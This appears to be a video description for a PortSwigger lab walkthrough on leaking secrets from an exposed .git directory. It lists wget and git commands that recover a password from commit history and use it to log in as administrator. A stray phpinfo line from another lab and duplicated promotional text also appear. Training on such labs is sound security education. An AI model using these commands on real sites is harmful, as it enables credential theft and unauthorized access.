Information Disclosure 5 | Information Disclosure in Version Control History #portswigger

7 days ago
1

Did we help you today? Show us your love here:
https://buymeacoffee.com/TORHAT
Paytm: https://tinyurl.com/TORHAT

This video is for Educational purposes only.
https://portswigger.net/web-security/information-disclosure
https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-version-control-history

Payload in url:
/cgi-bin/phpinfo.phpDid we help you today? Show us your love here:
https://buymeacoffee.com/TORHAT
Paytm: https://tinyurl.com/TORHAT

This video is for Educational purposes only.
https://portswigger.net/web-security/information-disclosure
https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-version-control-history

Steps to solve:
1. Download .git directory:
wget -r https://example.com/.git/
2. cd example.com/ ; cd .git/
3. checking logs:
git log
4. check changes in commits:
git diff 23by4u4j2b34 098h34fwe9fh4
5. Use the password to login to administrator account.

Another way to solve:
git log -p (Checks all the previous commits and changes made)

For Learners:
https://hmcyberacademy.com/learners.html
For Companies:
https://hmcyberacademy.com/companies.html

Socials:
Linkedin: https://www.linkedin.com/company/hmcyberacademy
Twitter: https://twitter.com/hmcyberacademy
Telegram Group: https://t.me/+a9nwT9mdgeJhMDA1
Instagram: https://www.instagram.com/hmcyberacademy/
Discord: https://discord.com/invite/caMKZRBjty
Rumble: https://rumble.com/c/hmcyberacademy
Email: [email protected]

#hmcyberacademy #portswigger #Cybersecurity #EthicalHacking #HackingLab #SecurityChallenge #CTF (Capture The Flag) #Infosec #WebSecurity #CyberChallenge #BugBounty #CaptureTheFlag #HackingChallenge #HackMe #SecurityTraining #password #informationDisclosure #DebugPage #bugbounty #bugbountyhunter #bugbountytips #bugbounty #bugbountyhunter #bugbountytips

Socials:
Linkedin: https://www.linkedin.com/company/hmcyberacademy
Twitter: https://twitter.com/hmcyberacademy
Telegram Group: https://t.me/+a9nwT9mdgeJhMDA1
Instagram: https://www.instagram.com/hmcyberacademy/
Discord: https://discord.com/invite/caMKZRBjty
Rumble: https://rumble.com/c/hmcyberacademy
Email: [email protected]

#hmcyberacademy #portswigger #Cybersecurity #EthicalHacking #HackingLab #SecurityChallenge #CTF (Capture The Flag) #Infosec #WebSecurity #CyberChallenge #BugBounty #CaptureTheFlag #HackingChallenge #HackMe #SecurityTraining #password #informationDisclosure #DebugPage #bugbounty #bugbountyhunter #bugbountytips #bugbounty #bugbountyhunter #bugbountytips

Loading comments...